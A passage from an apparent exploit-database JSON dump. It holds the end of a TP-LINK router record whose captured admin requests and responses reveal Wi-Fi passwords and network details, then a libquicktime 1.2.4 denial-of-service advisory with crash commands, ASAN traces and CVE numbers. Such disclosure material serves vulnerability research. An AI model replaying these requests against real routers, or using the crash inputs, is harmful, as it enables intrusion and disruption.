8\r\n },\r\n \"serverIPAddress\": \"198.168.0.1\",\r\n \"connection\": \"8081\"\r\n },\r\n {\r\n \"pageref\": \"page_1\",\r\n \"startedDateTime\": \"2018-07-17T13:11:39.644+03:00\",\r\n \"time\": 997,\r\n \"request\": {\r\n \"bodySize\": 14,\r\n \"method\": \"POST\",\r\n \"url\": \"http://198.168.0.1:8081/cgi-bin/luci/;stok=c3a68d8a0f1e21ffc30452833e2ddde7/admin/status?form=all\",\r\n \"httpVersion\": \"HTTP/1.1\",\r\n \"headers\": [\r\n {\r\n \"name\": \"Host\",\r\n \"value\": \"198.168.0.1:8081\"\r\n },\r\n {\r\n \"name\": \"User-Agent\",\r\n \"value\": \"Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0\"\r\n },\r\n {\r\n \"name\": \"Accept\",\r\n \"value\": \"application/json, text/javascript, */*; q=0.01\"\r\n },\r\n {\r\n \"name\": \"Accept-Language\",\r\n \"value\": \"en-US,en;q=0.5\"\r\n },\r\n {\r\n \"name\": \"Accept-Encoding\",\r\n \"value\": \"gzip, deflate\"\r\n },\r\n {\r\n \"name\": \"Referer\",\r\n \"value\": \"http://198.168.0.1/webpages/index.html\"\r\n },\r\n {\r\n \"name\": \"Content-Type\",\r\n \"value\": \"application/x-www-form-urlencoded; charset=UTF-8\"\r\n },\r\n {\r\n \"name\": \"X-Requested-With\",\r\n \"value\": \"XMLHttpRequest\"\r\n },\r\n {\r\n \"name\": \"Content-Length\",\r\n \"value\": \"14\"\r\n },\r\n {\r\n \"name\": \"Cookie\",\r\n \"value\": \"sysauth=e3638eb1f1952c2a56bd50f466603048\"\r\n },\r\n {\r\n \"name\": \"Connection\",\r\n \"value\": \"keep-alive\"\r\n }\r\n ],\r\n \"cookies\": [\r\n {\r\n \"name\": \"sysauth\",\r\n \"value\": \"e3638eb1f1952c2a56bd50f466603048\"\r\n }\r\n ],\r\n \"queryString\": [\r\n {\r\n \"name\": \"form\",\r\n \"value\": \"all\"\r\n }\r\n ],\r\n \"postData\": {\r\n \"mimeType\": \"application/x-www-form-urlencoded\",\r\n \"params\": [],\r\n \"text\": \"operation=read\"\r\n },\r\n \"headersSize\": 569\r\n },\r\n \"response\": {\r\n \"status\": 200,\r\n \"statusText\": \"OK\",\r\n \"httpVersion\": \"HTTP/1.1\",\r\n \"headers\": [\r\n {\r\n \"name\": \"Connection\",\r\n \"value\": 
\"close\"\r\n },\r\n {\r\n \"name\": \"Transfer-Encoding\",\r\n \"value\": \"chunked\"\r\n },\r\n {\r\n \"name\": \"Content-Type\",\r\n \"value\": \"application/json\"\r\n },\r\n {\r\n \"name\": \"Cache-Control\",\r\n \"value\": \"no-cache\"\r\n },\r\n {\r\n \"name\": \"Expires\",\r\n \"value\": \"0\"\r\n }\r\n ],\r\n \"cookies\": [],\r\n \"content\": {\r\n \"mimeType\": \"application/json\",\r\n \"size\": 4758,\r\n \"text\": \"{\\\"success\\\":true,\\\"data\\\":{\\\"guest_2g5g_psk_key\\\":\\\"64187396\\\",\\\"wan_ipv4_netmask\\\":\\\"255.255.255.255\\\",\\\"wireless_2g_wds_status\\\":\\\"disable\\\",\\\"wireless_2g_wep_format2\\\":\\\"hex\\\",\\\"guest_2g5g_encryption\\\":\\\"none\\\",\\\"wan_ipv6_conntype\\\":\\\"none\\\",\\\"wireless_5g_wep_key2\\\":\\\"\\\",\\\"wireless_2g_port\\\":\\\"1812\\\",\\\"wireless_2g_htmode\\\":\\\"40\\\",\\\"storage_vendor\\\":\\\"\\\",\\\"wireless_2g_wep_type2\\\":\\\"64\\\",\\\"wireless_5g_wep_select\\\":\\\"1\\\",\\\"wireless_2g_psk_key\\\":\\\"64187396\\\",\\\"wireless_2g_wep_type1\\\":\\\"64\\\",\\\"wireless_5g_wep_type4\\\":\\\"64\\\",\\\"wan_ipv4_snddns\\\":\\\"198.168.0.1\\\",\\\"wireless_5g_extinfo\\\":{\\\"wds_guest_compatible\\\":\\\"yes\\\",\\\"support_guest_dynpasswd\\\":\\\"no\\\",\\\"support_wds_show\\\":\\\"yes\\\",\\\"support_band\\\":\\\"both\\\",\\\"support_wds_dualmode\\\":\\\"yes\\\",\\\"wds2g_wds5g_compatible\\\":\\\"no\\\"},\\\"guest_2g_hidden\\\":\\\"off\\\",\\\"wireless_2g_channel\\\":\\\"1\\\",\\\"wireless_2g_wpa_version\\\":\\\"auto\\\",\\\"wireless_5g_psk_key\\\":\\\"64187396\\\",\\\"lan_ipv4_netmask\\\":\\\"255.255.255.0\\\",\\\"wireless_5g_wep_key1\\\":\\\"\\\",\\\"lan_macaddr\\\":\\\"50-C7-BF-52-10-2E\\\",\\\"wireless_2g_encryption\\\":\\\"psk\\\",\\\"wireless_2g_psk_cipher\\\":\\\"auto\\\",\\\"wireless_5g_port\\\":\\\"1812\\\",\\\"wireless_5g_wps_state\\\":\\\"configured\\\",\\\"wireless_5g_wpa_cipher\\\":\\\"auto\\\",\\\"guest_5g_disabled\\\":\\\"off\\\",\\\"wireless_5g_hwmode\\\":\\\"anac_5\\\",\\\"la
n_ipv6_link_local_addr\\\":\\\"FE80::52C7:BFFF:FE52:102E/64\\\",\\\"modem_ipaddr\\\":\\\"0.0.0.0\\\",\\\"wan_ipv6_snddns\\\":\\\"::\\\",\\\"wireless_2g_wep_type4\\\":\\\"64\\\",\\\"guest_2g_ssid\\\":\\\"TP-LINK_Guest_102E\\\",\\\"wireless_5g_wpa_key\\\":\\\"\\\",\\\"guest_isolate\\\":\\\"off\\\",\\\"wan_macaddr\\\":\\\"50-C7-BF-52-10-2F\\\",\\\"wireless_5g_hidden\\\":\\\"off\\\",\\\"wireless_2g_wep_key4\\\":\\\"\\\",\\\"wireless_2g_disabled_all\\\":\\\"off\\\",\\\"wireless_5g_htmode\\\":\\\"auto\\\",\\\"wan_ipv4_gateway\\\":\\\"198.168.0.1\\\",\\\"guest_2g_psk_key\\\":\\\"64187396\\\",\\\"guest_5g_psk_version\\\":\\\"auto\\\",\\\"wireless_5g_wep_format4\\\":\\\"hex\\\",\\\"modem_connstatus\\\":0,\\\"wireless_5g_channel\\\":\\\"auto\\\",\\\"wan_ipv6_enable\\\":\\\"off\\\",\\\"guest_2g5g_psk_version\\\":\\\"auto\\\",\\\"wireless_2g_wep_mode\\\":\\\"auto\\\",\\\"wireless_5g_wpa_version\\\":\\\"auto\\\",\\\"wireless_5g_wep_type3\\\":\\\"64\\\",\\\"wireless_5g_wds_status\\\":\\\"disable\\\",\\\"wireless_2g_wep_format3\\\":\\\"hex\\\",\\\"wireless_5g_disabled\\\":\\\"off\\\",\\\"wireless_5g_ssid\\\":\\\"TP-LINK_102E_5G\\\",\\\"wireless_5g_wep_format1\\\":\\\"hex\\\",\\\"storage_capacity\\\":0,\\\"access_devices_wired\\\":[{\\\"wire_type\\\":\\\"wired\\\",\\\"macaddr\\\":\\\"98-DE-D0-F9-0A-C7\\\",\\\"ipaddr\\\":\\\"192.168.0.103\\\",\\\"hostname\\\":\\\"*\\\"}],\\\"guest_2g_disabled\\\":\\\"off\\\",\\\"guest_5g_psk_key\\\":\\\"64187396\\\",\\\"wireless_5g_encryption\\\":\\\"psk\\\",\\\"guest_5g_hidden\\\":\\\"off\\\",\\\"guest_access\\\":\\\"off\\\",\\\"wireless_5g_disabled_all\\\":\\\"off\\\",\\\"guest_5g_extinfo\\\":{\\\"wds_guest_compatible\\\":\\\"yes\\\",\\\"support_guest_dynpasswd\\\":\\\"no\\\",\\\"support_wds_show\\\":\\\"yes\\\",\\\"support_band\\\":\\\"both\\\",\\\"support_wds_dualmode\\\":\\\"yes\\\",\\\"wds2g_wds5g_compatible\\\":\\\"no\\\"},\\\"wireless_5g_current_channel\\\":\\\"40\\\",\\\"wireless_2g_wpa_cipher\\\":\\\"auto\\\",\\\"guest_5g_encryption\\\":\\
\"none\\\",\\\"wireless_2g_wep_key3\\\":\\\"\\\",\\\"wireless_2g_enable\\\":\\\"on\\\",\\\"guest_2g_encryption\\\":\\\"none\\\",\\\"wireless_2g_extinfo\\\":{\\\"wds_guest_compatible\\\":\\\"yes\\\",\\\"support_guest_dynpasswd\\\":\\\"no\\\",\\\"support_wds_show\\\":\\\"yes\\\",\\\"support_band\\\":\\\"both\\\",\\\"support_wds_dualmode\\\":\\\"yes\\\",\\\"wds2g_wds5g_compatible\\\":\\\"no\\\"},\\\"guest_5g_ssid\\\":\\\"TP-LINK_Guest_102E_5G\\\",\\\"wireless_2g_wep_format4\\\":\\\"hex\\\",\\\"wireless_2g_macaddr\\\":\\\"50-C7-BF-52-10-2E\\\",\\\"guest_2g5g_passwd_cycle\\\":\\\"never\\\",\\\"guest_5g_enable\\\":\\\"off\\\",\\\"guest_2g_psk_version\\\":\\\"auto\\\",\\\"storage_available_unit\\\":\\\"B\\\",\\\"wan_ipv6_gateway\\\":\\\"::\\\",\\\"printer_name\\\":\\\"None\\\",\\\"wireless_2g_wep_key2\\\":\\\"\\\",\\\"printer_count\\\":0,\\\"wireless_2g_wep_format1\\\":\\\"hex\\\",\\\"storage_available\\\":0,\\\"modem_pridns\\\":\\\"0.0.0.0\\\",\\\"modem_signal\\\":\\\"0%\\\",\\\"wireless_2g_current_channel\\\":\\\"1\\\",\\\"wireless_2g_psk_version\\\":\\\"auto\\\",\\\"wireless_5g_wep_type2\\\":\\\"64\\\",\\\"modem_netmask\\\":\\\"0.0.0.0\\\",\\\"conn_type\\\":\\\"0\\\",\\\"wireless_2g_wps_state\\\":\\\"configured\\\",\\\"modem_gateway\\\":\\\"0.0.0.0\\\",\\\"wireless_5g_psk_version\\\":\\\"auto\\\",\\\"modem_snddns\\\":\\\"0.0.0.0\\\",\\\"wireless_2g_ssid\\\":\\\"TP-LINK_102E\\\",\\\"mem_usage\\\":0.63,\\\"cpu_usage\\\":0.01,\\\"wan_ipv4_ipaddr\\\":\\\"198.168.0.1\\\",\\\"guest_2g_extinfo\\\":{\\\"wds_guest_compatible\\\":\\\"yes\\\",\\\"support_guest_dynpasswd\\\":\\\"no\\\",\\\"support_wds_show\\\":\\\"yes\\\",\\\"support_band\\\":\\\"both\\\",\\\"support_wds_dualmode\\\":\\\"yes\\\",\\\"wds2g_wds5g_compatible\\\":\\\"no\\\"},\\\"lan_ipv6_assign_type\\\":\\\"slaac\\\",\\\"wireless_2g_wep_type3\\\":\\\"64\\\",\\\"wireless_2g_wep_select\\\":\\\"1\\\",\\\"lan_ipv4_ipaddr\\\":\\\"192.168.0.1\\\",\\\"wireless_2g_txpower\\\":\\\"high\\\",\\\"wireless_2g_disabled\\\":\\\"off\\
\",\\\"guest_5g_psk_cipher\\\":\\\"auto\\\",\\\"wireless_2g_wpa_key\\\":\\\"\\\",\\\"wireless_5g_txpower\\\":\\\"high\\\",\\\"wan_ipv6_ip6addr\\\":\\\"::\\\",\\\"wireless_5g_wep_mode\\\":\\\"auto\\\",\\\"guest_2g_psk_cipher\\\":\\\"auto\\\",\\\"wireless_5g_wep_key4\\\":\\\"\\\",\\\"wireless_5g_wep_format2\\\":\\\"hex\\\",\\\"wireless_2g_wep_key1\\\":\\\"\\\",\\\"wireless_5g_wep_format3\\\":\\\"hex\\\",\\\"wireless_5g_macaddr\\\":\\\"50-C7-BF-52-10-2D\\\",\\\"lan_ipv4_dhcp_enable\\\":\\\"On\\\",\\\"wireless_2g_server\\\":\\\"\\\",\\\"wireless_5g_server\\\":\\\"\\\",\\\"wireless_2g_hwmode\\\":\\\"bgn\\\",\\\"wireless_5g_wep_type1\\\":\\\"64\\\",\\\"wireless_5g_enable\\\":\\\"on\\\",\\\"wan_ipv4_pridns\\\":\\\"198.168.0.1\\\",\\\"guest_2g_enable\\\":\\\"off\\\",\\\"wireless_5g_wep_key3\\\":\\\"\\\",\\\"wireless_5g_psk_cipher\\\":\\\"auto\\\",\\\"wan_ipv6_pridns\\\":\\\"::\\\",\\\"wireless_2g_hidden\\\":\\\"off\\\",\\\"storage_capacity_unit\\\":\\\"B\\\",\\\"wan_ipv4_conntype\\\":\\\"pppoe\\\",\\\"lan_ipv6_ipaddr\\\":\\\"FE80::52C7:BFFF:FE52:102E/64\\\",\\\"guest_2g5g_psk_cipher\\\":\\\"auto\\\"}}\"\r\n },\r\n \"redirectURL\": \"\",\r\n \"headersSize\": 135,\r\n \"bodySize\": 4758\r\n },\r\n \"cache\": {},\r\n \"timings\": {\r\n \"blocked\": 272,\r\n \"dns\": 0,\r\n \"connect\": 0,\r\n \"send\": 0,\r\n \"wait\": 701,\r\n \"receive\": 24\r\n },\r\n \"serverIPAddress\": \"198.168.0.1\",\r\n \"connection\": \"8081\"\r\n },\r\n {\r\n \"pageref\": \"page_1\",\r\n \"startedDateTime\": \"2018-07-17T13:11:39.647+03:00\",\r\n \"time\": 1835,\r\n \"request\": {\r\n \"bodySize\": 14,\r\n \"method\": \"POST\",\r\n \"url\": \"http://198.168.0.1:8081/cgi-bin/luci/;stok=c3a68d8a0f1e21ffc30452833e2ddde7/admin/status?form=internet\",\r\n \"httpVersion\": \"HTTP/1.1\",\r\n \"headers\": [\r\n {\r\n \"name\": \"Host\",\r\n \"value\": \"198.168.0.1:8081\"\r\n },\r\n {\r\n \"name\": \"User-Agent\",\r\n \"value\": \"Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0\"\r\n 
},\r\n {\r\n \"name\": \"Accept\",\r\n \"value\": \"application/json, text/javascript, */*; q=0.01\"\r\n },\r\n {\r\n \"name\": \"Accept-Language\",\r\n \"value\": \"en-US,en;q=0.5\"\r\n },\r\n {\r\n \"name\": \"Accept-Encoding\",\r\n \"value\": \"gzip, deflate\"\r\n },\r\n {\r\n \"name\": \"Referer\",\r\n \"value\": \"http://198.168.0.1:8081/webpages/index.html\"\r\n },\r\n {\r\n \"name\": \"Content-Type\",\r\n \"value\": \"application/x-www-form-urlencoded; charset=UTF-8\"\r\n },\r\n {\r\n \"name\": \"X-Requested-With\",\r\n \"value\": \"XMLHttpRequest\"\r\n },\r\n {\r\n \"name\": \"Content-Length\",\r\n \"value\": \"14\"\r\n },\r\n {\r\n \"name\": \"Cookie\",\r\n \"value\": \"sysauth=e3638eb1f1952c2a56bd50f466603048\"\r\n },\r\n {\r\n \"name\": \"Connection\",\r\n \"value\": \"keep-alive\"\r\n }\r\n ],\r\n \"cookies\": [\r\n {\r\n \"name\": \"sysauth\",\r\n \"value\": \"e3638eb1f1952c2a56bd50f466603048\"\r\n }\r\n ],\r\n \"queryString\": [\r\n {\r\n \"name\": \"form\",\r\n \"value\": \"internet\"\r\n }\r\n ],\r\n \"postData\": {\r\n \"mimeType\": \"application/x-www-form-urlencoded\",\r\n \"params\": [],\r\n \"text\": \"operation=read\"\r\n },\r\n \"headersSize\": 574\r\n },\r\n \"response\": {\r\n \"status\": 200,\r\n \"statusText\": \"OK\",\r\n \"httpVersion\": \"HTTP/1.1\",\r\n \"headers\": [\r\n {\r\n \"name\": \"Connection\",\r\n \"value\": \"close\"\r\n },\r\n {\r\n \"name\": \"Transfer-Encoding\",\r\n \"value\": \"chunked\"\r\n },\r\n {\r\n \"name\": \"Content-Type\",\r\n \"value\": \"application/json\"\r\n },\r\n {\r\n \"name\": \"Cache-Control\",\r\n \"value\": \"no-cache\"\r\n },\r\n {\r\n \"name\": \"Expires\",\r\n \"value\": \"0\"\r\n }\r\n ],\r\n \"cookies\": [],\r\n \"content\": {\r\n \"mimeType\": \"application/json\",\r\n \"size\": 55,\r\n \"text\": \"{\\\"success\\\":true,\\\"data\\\":{\\\"internet_status\\\":\\\"connected\\\"}}\"\r\n },\r\n \"redirectURL\": \"\",\r\n \"headersSize\": 135,\r\n \"bodySize\": 55\r\n },\r\n \"cache\": {},\r\n 
\"timings\": {\r\n \"blocked\": 270,\r\n \"dns\": 251,\r\n \"connect\": 521,\r\n \"send\": 0,\r\n \"wait\": 785,\r\n \"receive\": 8\r\n },\r\n \"serverIPAddress\": \"198.168.0.1\",\r\n \"connection\": \"8081\"\r\n }\r\n ]\r\n }\r\n}\r\n\r\n# You want to follow my activity ?\r\n\r\nhttps://www.linkedin.com/in/ismailtasdelen\r\nhttps://github.com/ismailtasdelen\r\nhttps://packetstormsecurity.com/user/ismailtasdelen\n\n# 0day.today [2018-07-24] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/30759"}, {"lastseen": "2018-02-28T01:37:24", "bulletinFamily": "exploit", "description": "Exploit for linux platform in category dos / poc", "modified": "2017-06-10T00:00:00", "published": "2017-06-10T00:00:00", "href": "https://0day.today/exploit/description/27921", "id": "1337DAY-ID-27921", "title": "libquicktime 1.2.4 - Denial of Service Vulnerability", "type": "zdt", "sourceData": "libquicktime multiple vulnerabilities\r\n \r\n \r\n================\r\nAuthor : qflb.wu\r\n===============\r\n \r\n \r\nIntroduction:\r\n=============\r\nThe libquicktime package contains the libquicktime library, various plugins and codecs, along with graphical and command line utilities used for encoding and decoding QuickTime files. This is useful for reading and writing files in the QuickTime format. 
The goal of the project is to enhance, while providing compatibility with the Quicktime 4 Linux library.\r\n \r\n \r\nAffected version:\r\n=====\r\n1.2.4\r\n \r\n \r\nVulnerability Description:\r\n==========================\r\n##################################\r\n1.\r\nthe quicktime_read_moov function in moov.c in libquicktime 1.2.4 can cause a denial of service(infinite loop and CPU consumption) via a crafted mp4 file.\r\n \r\n \r\n./lqtplay libquicktime_1.2.4_quicktime_read_moov_infinite_loop.mp4\r\n \r\n \r\nPOC:\r\nlibquicktime_1.2.4_quicktime_read_moov_infinite_loop.mp4\r\nCVE:\r\nCVE-2017-9122\r\n \r\n \r\n###################################\r\n2.\r\nthe lqt_frame_duration function in lqt_quicktime.c in libquicktime 1.2.4 can cause a denial of service(invalid memory read and application crash) via a crafted mp4 file.\r\n \r\n \r\n./lqtplay libquicktime_1.2.4_lqt_frame_duration_invalid_memory_read.mp4\r\n \r\n \r\nASAN:SIGSEGV\r\n=================================================================\r\n==14254==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000004 (pc 0x7f31e6ae7185 sp 0x7ffed033a270 bp 0x0000006bdb50 T0)\r\n==14254==WARNING: Trying to symbolize code, but external symbolizer is not initialized!\r\n #0 0x7f31e6ae7184 (/usr/local/lib/libquicktime.so.0+0x6c184)\r\n #1 0x49b1c6 (/home/a/Downloads/libquicktime-1.2.4/utils/.libs/lqtplay+0x49b1c6)\r\n #2 0x47fbaa (/home/a/Downloads/libquicktime-1.2.4/utils/.libs/lqtplay+0x47fbaa)\r\n #3 0x7f31e43b2ec4 (/lib/x86_64-linux-gnu/libc.so.6+0x21ec4)\r\n #4 0x47f3dc (/home/a/Downloads/libquicktime-1.2.4/utils/.libs/lqtplay+0x47f3dc)\r\n \r\n \r\nAddressSanitizer can not provide additional info.\r\nSUMMARY: AddressSanitizer: SEGV ??:0 ??\r\n==14254==ABORTING\r\n \r\n \r\ndebug info:\r\nProgram received signal SIGSEGV, Segmentation fault.\r\n...\r\nStopped reason: SIGSEGV\r\n0x00007ffff7829185 in lqt_frame_duration (file=<optimized out>, track=<optimized out>, \r\n constant=<optimized out>) at 
lqt_quicktime.c:1242\r\n1242 return\r\n \r\n \r\nPOC:\r\nlibquicktime_1.2.4_lqt_frame_duration_invalid_memory_read.mp4\r\nCVE:\r\nCVE-2017-9123\r\n \r\n \r\n###################################\r\n3.\r\nthe quicktime_match_32 in util.c in libquicktime 1.2.4 can cause a denial of service(NULL pointer dereference and application crash) via a crafted mp4 file.\r\n \r\n \r\n./lqtplay libquicktime_1.2.4_quicktime_match_32_NULL_pointer_dereference.mp4\r\n \r\n \r\nASAN:SIGSEGV\r\n=================================================================\r\n==14359==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x7fe8af6b85d8 sp 0x7fff490cd4e0 bp 0x7fff490cd5b0 T0)\r\n==14359==WARNING: Trying to symbolize code, but external symbolizer is not initialized!\r\n #0 0x7fe8af6b85d7 (/usr/local/lib/libquicktime.so.0+0x3605d7)\r\n #1 0x7fe8af68b566 (/usr/local/lib/libquicktime.so.0+0x333566)\r\n #2 0x7fe8af63c71a (/usr/local/lib/libquicktime.so.0+0x2e471a)\r\n #3 0x7fe8af3d1658 (/usr/local/lib/libquicktime.so.0+0x79658)\r\n #4 0x7fe8af3d84a8 (/usr/local/lib/libquicktime.so.0+0x804a8)\r\n #5 0x7fe8af3a95da (/usr/local/lib/libquicktime.so.0+0x515da)\r\n #6 0x47fad2 (/home/a/Downloads/libquicktime-1.2.4/utils/.libs/lqtplay+0x47fad2)\r\n #7 0x7fe8acc8fec4 (/lib/x86_64-linux-gnu/libc.so.6+0x21ec4)\r\n #8 0x47f3dc (/home/a/Downloads/libquicktime-1.2.4/utils/.libs/lqtplay+0x47f3dc)\r\n \r\n \r\nAddressSanitizer can not provide additional info.\r\nSUMMARY: AddressSanitizer: SEGV ??:0 ??\r\n==14359==ABORTING\r\n \r\n \r\ndebug info:\r\nProgram received signal SIGSEGV, Segmentation fault.\r\nStopped reason: SIGSEGV\r\n0x00007ffff7b1d5d8 in quicktime_match_32 (_input=<optimized out>, \r\n _output=<optimized out>) at util.c:874\r\n874if(input[0] == output[0] &&\r\n \r\n \r\nPOC:\r\nlibquicktime_1.2.4_quicktime_match_32_NULL_pointer_dereference.mp4\r\nCVE:\r\nCVE-2017-9124\r\n \r\n \r\n###################################\r\n4.\r\nthe lqt_frame_duration function in lqt_quicktime.c 
in libquicktime 1.2.4 can cause a denial of service(heap-buffer-overflow) via a crafted mp4 file.\r\n \r\n \r\n./lqtplay libquicktime_1.2.4_lqt_frame_duration_heap-buffer-overflow.mp4\r\n \r\n \r\n=================================================================\r\n==40038==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x602000009cd4 at pc 0x7f28959fc45f bp 0x7ffefd561530 sp 0x7ffefd561528\r\nREAD of size 4 at 0x602000009cd4 thread T0\r\n #0 0x7f28959fc45e in lqt_frame_duration /home/a/Downloads/libquicktime-1.2.4/src/lqt_quicktime.c:1242\r\n #1 0x49b1c6 in quicktime_print_info /home/a/Downloads/libquicktime-1.2.4/utils/common.c:138\r\n #2 0x47fbaa in qt_init /home/a/Downloads/libquicktime-1.2.4/utils/lqtplay.c:996\r\n #3 0x47fbaa in main /home/a/Downloads/libquicktime-1.2.4/utils/lqtplay.c:1852\r\n #4 0x7f28932c7ec4 (/lib/x86_64-linux-gnu/libc.so.6+0x21ec4)\r\n #5 0x47f3dc in _start (/home/a/Downloads/libquicktime-1.2.4/utils/.libs/lqtplay+0x47f3dc)\r\n \r\n \r\n0x602000009cd4 is located 3 bytes to the right of 1-byte region [0x602000009cd0,0x602000009cd1)\r\nallocated by thread T0 here:\r\n #0 0x4692f9 in malloc (/home/a/Downloads/libquicktime-1.2.4/utils/.libs/lqtplay+0x4692f9)\r\n #1 0x7f2895cad7d0 in quicktime_read_stts /home/a/Downloads/libquicktime-1.2.4/src/stts.c:115\r\n \r\n \r\nSUMMARY: AddressSanitizer: heap-buffer-overflow /home/a/Downloads/libquicktime-1.2.4/src/lqt_quicktime.c:1242 lqt_frame_duration\r\nShadow bytes around the buggy address:\r\n 0x0c047fff9340: fa fa 05 fa fa fa 05 fa fa fa 04 fa fa fa 05 fa\r\n 0x0c047fff9350: fa fa 00 fa fa fa 05 fa fa fa 05 fa fa fa 05 fa\r\n 0x0c047fff9360: fa fa 05 fa fa fa 00 fa fa fa 05 fa fa fa 05 fa\r\n 0x0c047fff9370: fa fa 05 fa fa fa 00 fa fa fa 00 00 fa fa 00 01\r\n 0x0c047fff9380: fa fa 04 fa fa fa 05 fa fa fa 00 fa fa fa 05 fa\r\n=>0x0c047fff9390: fa fa 05 fa fa fa 00 fa fa fa[01]fa fa fa 00 04\r\n 0x0c047fff93a0: fa fa 00 00 fa fa 00 fa fa fa 00 fa fa fa 00 00\r\n 0x0c047fff93b0: fa fa 00 
00 fa fa 00 00 fa fa 00 fa fa fa 00 00\r\n 0x0c047fff93c0: fa fa 00 00 fa fa 00 00 fa fa 00 00 fa fa 00 fa\r\n 0x0c047fff93d0: fa fa 00 00 fa fa 00 fa fa fa fd fd fa fa fd fd\r\n 0x0c047fff93e0: fa fa fd fd fa fa 00 04 fa fa 00 00 fa fa fd fa\r\nShadow byte legend (one shadow byte represents 8 application bytes):\r\n Addressable: 00\r\n Partially addressable: 01 02 03 04 05 06 07 \r\n Heap left redzone: fa\r\n Heap right redzone: fb\r\n Freed heap region: fd\r\n Stack left redzone: f1\r\n Stack mid redzone: f2\r\n Stack right redzone: f3\r\n Stack partial redzone: f4\r\n Stack after return: f5\r\n Stack use after scope: f8\r\n Global redzone: f9\r\n Global init order: f6\r\n Poisoned by user: f7\r\n ASan internal: fe\r\n==40038==ABORTING\r\n \r\n \r\nPOC:\r\nlibquicktime_1.2.4_lqt_frame_duration_heap-buffer-overflow.mp4\r\nCVE:\r\nCVE-2017-9125\r\n \r\n \r\n###################################\r\n5.\r\nthe quicktime_read_dref_table function in dref.c in libquicktime 1.2.4 can cause a denial of service(heap-buffer-overflow and application crash) via a crafted mp4 file.\r\n \r\n \r\n./lqtplay libquicktime_1.2.4_quicktime_read_dref_table_heap-buffer-overflow.mp4\r\n \r\n \r\n=================================================================\r\n==41637==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x602000009ce4 at pc 0x7f9cb9ad16e7 bp 0x7ffcf9a1e720 sp 0x7ffcf9a1e718\r\nWRITE of size 1 at 0x602000009ce4 thread T0\r\n #0 0x7f9cb9ad16e6 in quicktime_read_dref_table /home/a/Downloads/libquicktime-1.2.4/src/dref.c:69\r\n #1 0x7f9cb9ad3bdd in quicktime_read_dref /home/a/Downloads/libquicktime-1.2.4/src/dref.c:147\r\n #2 0x7f9cb9ad0388 in quicktime_read_dinf /home/a/Downloads/libquicktime-1.2.4/src/dinf.c:56\r\n #3 0x7f9cb9afdf09 in quicktime_read_minf /home/a/Downloads/libquicktime-1.2.4/src/minf.c:220\r\n #4 0x7f9cb9afaa9e in quicktime_read_mdia /home/a/Downloads/libquicktime-1.2.4/src/mdia.c:155\r\n #5 0x7f9cb9b4ff1e in quicktime_read_trak 
/home/a/Downloads/libquicktime-1.2.4/src/trak.c:247\r\n #6 0x7f9cb9b0172a in quicktime_read_moov /home/a/Downloads/libquicktime-1.2.4/src/moov.c:221\r\n #7 0x7f9cb9896658 in quicktime_read_info /home/a/Downloads/libquicktime-1.2.4/src/lqt_quicktime.c:1791\r\n #8 0x7f9cb989d4a8 in do_open /home/a/Downloads/libquicktime-1.2.4/src/lqt_quicktime.c:2026\r\n #9 0x7f9cb986e5da in quicktime_open /home/a/Downloads/libquicktime-1.2.4/src/lqt_quicktime.c:2075\r\n #10 0x47fad2 in qt_init /home/a/Downloads/libquicktime-1.2.4/utils/lqtplay.c:987\r\n #11 0x47fad2 in main /home/a/Downloads/libquicktime-1.2.4/utils/lqtplay.c:1852\r\n #12 0x7f9cb7154ec4 (/lib/x86_64-linux-gnu/libc.so.6+0x21ec4)\r\n #13 0x47f3dc in _start (/home/a/Downloads/libquicktime-1.2.4/utils/.libs/lqtplay+0x47f3dc)\r\n \r\n \r\n0x602000009ce4 is located 12 bytes to the left of 1-byte region [0x602000009cf0,0x602000009cf1)\r\nallocated by thread T0 here:\r\n #0 0x4692f9 in malloc (/home/a/Downloads/libquicktime-1.2.4/utils/.libs/lqtplay+0x4692f9)\r\n #1 0x7f9cb9ad13ba in quicktime_read_dref_table /home/a/Downloads/libquicktime-1.2.4/src/dref.c:66\r\n \r\n \r\nSUMMARY: AddressSanitizer: heap-buffer-overflow /home/a/Downloads/libquicktime-1.2.4/src/dref.c:69 quicktime_read_dref_table\r\nShadow bytes around the buggy address:\r\n 0x0c047fff9340: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\r\n 0x0c047fff9350: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\r\n 0x0c047fff9360: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\r\n 0x0c047fff9370: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\r\n 0x0c047fff9380: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\r\n=>0x0c047fff9390: fa fa fa fa fa fa fa fa fa fa fa fa[fa]fa 01 fa\r\n 0x0c047fff93a0: fa fa 00 00 fa fa 00 fa fa fa 00 fa fa fa 00 00\r\n 0x0c047fff93b0: fa fa 00 00 fa fa 00 00 fa fa 00 fa fa fa 00 00\r\n 0x0c047fff93c0: fa fa 00 00 fa fa 00 00 fa fa 00 00 fa fa 00 fa\r\n 0x0c047fff93d0: fa fa 00 00 fa fa 00 fa fa fa fd fd fa fa fd fd\r\n 0x0c047fff93e0: 
fa fa fd fd fa fa 00 04 fa fa 00 00 fa fa fd fa\r\nShadow byte legend (one shadow byte represents 8 application bytes):\r\n Addressable: 00\r\n Partially addressable: 01 02 03 04 05 06 07 \r\n Heap left redzone: fa\r\n Heap right redzone: fb\r\n Freed heap region: fd\r\n Stack left redzone: f1\r\n Stack mid redzone: f2\r\n Stack right redzone: f3\r\n Stack partial redzone: f4\r\n Stack after return: f5\r\n Stack use after scope: f8\r\n Global redzone: f9\r\n Global init order: f6\r\n Poisoned by user: f7\r\n ASan internal: fe\r\n==41637==ABORTING\r\n \r\n \r\nPOC:\r\nlibquicktime_1.2.4_quicktime_read_dref_table_heap-buffer-overflow.mp4\r\nCVE:\r\nCVE-2017-9126\r\n \r\n \r\n###################################\r\n6.\r\nthe quicktime_user_atoms_read_atom function in useratoms.c in libquicktime 1.2.4 can cause a denial of service(heap-buffer-overflow and application crash) via a crafted mp4 file.\r\n \r\n \r\n./lqtplay 